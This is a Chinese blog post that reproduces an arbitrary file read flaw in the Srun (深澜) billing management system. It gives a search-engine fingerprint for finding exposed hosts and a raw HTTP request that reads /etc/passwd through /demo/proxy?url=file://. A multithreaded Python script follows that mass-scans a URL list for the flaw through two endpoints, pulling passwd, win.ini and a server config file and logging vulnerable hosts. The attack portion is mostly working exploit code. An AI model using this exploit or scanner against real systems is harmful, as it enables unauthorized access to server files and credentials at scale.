【深澜计费管理系统存在任意文件读取漏洞复现和检测脚本】

已于 2024-08-03 13:22:35 修改
阅读量226 收藏 2
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-03 13:19:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/140889230
版权

目录

一、漏洞介绍

二、poc利用

三、批量检测脚本

一、漏洞介绍

   深澜计费管理系统存在任意文件读取漏洞。攻击者可以利用这个漏洞读取服务器上的任何文件,包括配置文件、源代码文件和敏感数据等。

二、poc利用

360 quake:

favicon: "1fc27943c1f0d9b54cc40855ba746fad"

GET /demo/proxy?url=file:///etc/passwd HTTP/2
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Priority: u=0, i
Connection: close

三、批量检测脚本

import requests
import threading

requests.packages.urllib3.disable_warnings()
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}

uri = {
    "u1": "/user/group/down-load?file=",
    "u2": "/demo/proxy?url=file://"
}

file1 = {
    "p1": "/srun3/www/srun4-auth/common/config/main-local.php",
    "p2": "/etc/passwd",
    "p3": "C:/Windows/win.ini",
}

file2 = {
    "p1": "/etc/passwd",
    "p2": "C:/Windows/win.ini"
}

def poc(url):
    resp1 = []
    resp2 = []

    # 文件下载漏洞
    for i in file1:
        url1 = url.strip() + uri['u1'] + file1[i]
        try:
            resp1.append(requests.get(url=url1, headers=header, verify=False, timeout=5).text)
        except requests.RequestException as e:
            pass

    # 文件读取漏洞
    for k in file2:
        url2 = url.strip() + uri['u2'] + file2[k]
        try:
            resp2.append(requests.get(url=url2, headers=header, verify=False, timeout=5).text)
        except requests.RequestException as e:
            pass

    return resp1, resp2

def panduan(url):
    url_list = []
    rsp1, rsp2 = poc(url)

    for i in rsp2:
        if i is not None and ("root" in i or "/bin/bash" in i or "bin" in i):
            print(f"{url}存在:文件读取漏洞,poc信息为:{url}/demo/proxy?url=file:///etc/passwd")
            url_list.append(f"{url}/demo/proxy?url=file:///etc/passwd")
        elif i is not None and ("for 16-bit app support" in i or "[fonts]" in i or "[extensions]" in i):
            print(f"{url}存在:文件读取漏洞,poc信息为:{url}/demo/proxy?url=file:///C:/Windows/win.ini")
            url_list.append(f"{url}/demo/proxy?url=file:///C:/Windows/win.ini")

    with open("vulnerable.txt", "a") as f:
        for i in url_list:
            f.write(i + "\n")
   # print("生成包含漏洞的文件")

def muti_theading(url):
    threads = []
    t = threading.Thread(target=panduan, args=(url,))
    threads.append(t)
    t.start()

if __name__ == '__main__':
    with open("url.txt", "r") as f:
        for i in f.readlines():
            url = i.strip()
            muti_theading(url)
    print("完成")

网安第一深禽
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深澜计费管理系统 任意文件读取漏洞复现
0xSec
04-05 806
深澜计费管理系统/demo/proxy接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现深澜计费管理系统任意文件读取漏洞
qq_67810151的博客
04-10 591
深澜计费管理系统存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件
深澜计费管理系统 /demo/proxy存在任意文件读取漏洞
wan___she__pi的博客
04-18 593
深澜计费管理系统是一款用于网络设备计费管理的软件系统。它主要用于对网络设备的使用情况进行监控和计费,帮助企业实现对网络资源的合理分配和使用。深澜计费管理系统/demo/proxy存在任意文件读取漏洞
深澜计费管理系统任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
05-30 415
深澜计费管理系统是一个全面的软件解决方案,旨在帮助企业管理其计费和发票流程。它提供了一套全面的功能,可简化计费任务,提高准确性并优化收入管理。
蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-21 624
蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
蓝海卓越计费管理系统 download.php 任意文件读取漏洞
千寻的博客
05-14 1861
文章目录漏洞名称漏洞描述影响版本fofa漏洞复现一第一步 访问系统第二步 查看漏洞点第三步 数据包重放,查看/etc/passwd第四步 数据包重放,查看/root/.ssh/authorized_keys摘抄 漏洞名称 蓝海卓越计费管理系统 download.php 任意文件读取漏洞 漏洞描述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞, 攻击者通过 …/ 遍历目录可以读取服务器上的敏感文件 /download.php?file=…/…/…/…/…/etc/passwd
任意文件读取及删除漏洞
weixin_45007073的博客
02-02 3312
任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件任意文件读取漏洞,是web安全里高危的漏洞,它可以泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。 文件读取常见的函数 fopen file_get_contents fread fgets fgetss file fpassthru parse_ini_file readfile
基于Java+SpringBoot+Vue前后端分离智能停车计费系统设计和实现
java李阳勇的博客
07-11 7630
随着人们生活水平的高速发展,智能停车计费信息管理方面在近年来呈直线上升,人们也了解到智能停车计费的实用性,因此智能停车计费的管理也逐年递增,智能停车计费信息的增加加大了在管理上的工作难度。为了能更好的维护智能停车计费管理秩序,同时提高工作的效率、确保每一用户都能得到有效的保护,在进行全面调研、探求实际情况之后本人设计并实现了智能停车计费系统。该系统采用了java技术、SpringBoot 框架,连接MySQL数据库,具有较高的信息传输速率与较强的数据处理能力。
深澜系统服务器架构,深澜基于用户策略的高性能校园网认证计费系统
weixin_39637545的博客
08-06 2452
概述网络发展到现今,教育行业的网络的应用已经获得了长足的发展。随着网络应用的深入,宽带接入互联网显现了很多亟待解决的管理问题。校园网迫切需要对于上网用户进行必要的管理。随着上网用户数量的增加,校园网早已不再是一个小的局域网,而更象是一个区网甚至于市级网的级别。同时校园网建设中还有其自身的特点:高接入,随着高校的发展、网络接入带宽越来越大,千兆接入已经成为常态,双千兆接入或者多千兆接入也更多的被使用...
蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
孤桜懶契
04-18 2834
漏洞描述 i ⭐蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行 漏洞影响 s ✅蓝海卓越计费管理系统 空间测绘 d ⭕Hunter:web.title="蓝海卓越计费管理系统" 漏洞复现 ✅访问首页 ✅执行Payload命令,访问路径/debug.php $ ifconfig eth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27 inet addr:192.168.0.1 Bcast:192.168.
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1448
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 922
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 545
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1146
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
某赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞复现(XVE-2024-19611)
0xSec
08-08 705
某赛通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 210
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
数据跨境传输的安全合规风险如何规避?获取免费解决方案白皮书
文件数据安全交换
08-07 339
在全球化的背景下,企业进行有 效的资源整合,学习海外市场的先进技术和管理经验,寻找新的增长点,实现业务的多元化和 可持续发展,不仅有利于开辟新市场,更有助于巩固和增强企业在全球中的地位。应用风险:跨境数据的承载介质多样、呈现形态各异、应用广泛,数据所在国的政策和法律存 在差异,这可能导致数据所有和使用者权限模糊,数据应用开发存在被滥用的风险。自然灾害(如火灾、水灾、地震等)和事故(如电力故障、设备故障等)可能导致数据的物理 损失,使数据的完整性和可用性遭到破坏,数据失去使用价值。2、数据攻击窃取风险。
Linux系统下的容器安全:原理、风险与防范措施
ddcajdkdl的博客
08-07 433
Linux命名空间为容器提供了独立的视图,包括PID、网络、UTS、IPC和mount命名空间,确保容器内的进程、网络配置、主机名、Inter-Process Communication和文件系统与宿主机隔离。Linux系统下的容器安全是一个至关重要的议题,涉及到容器的隔离性、网络访问控制、镜像安全、以及运行时保护等多个方面。通过cgroups,可以限制、记录和隔离容器使用的物理资源,如CPU、内存、I/O等,防止容器资源滥用影响宿主机或其它容器的稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值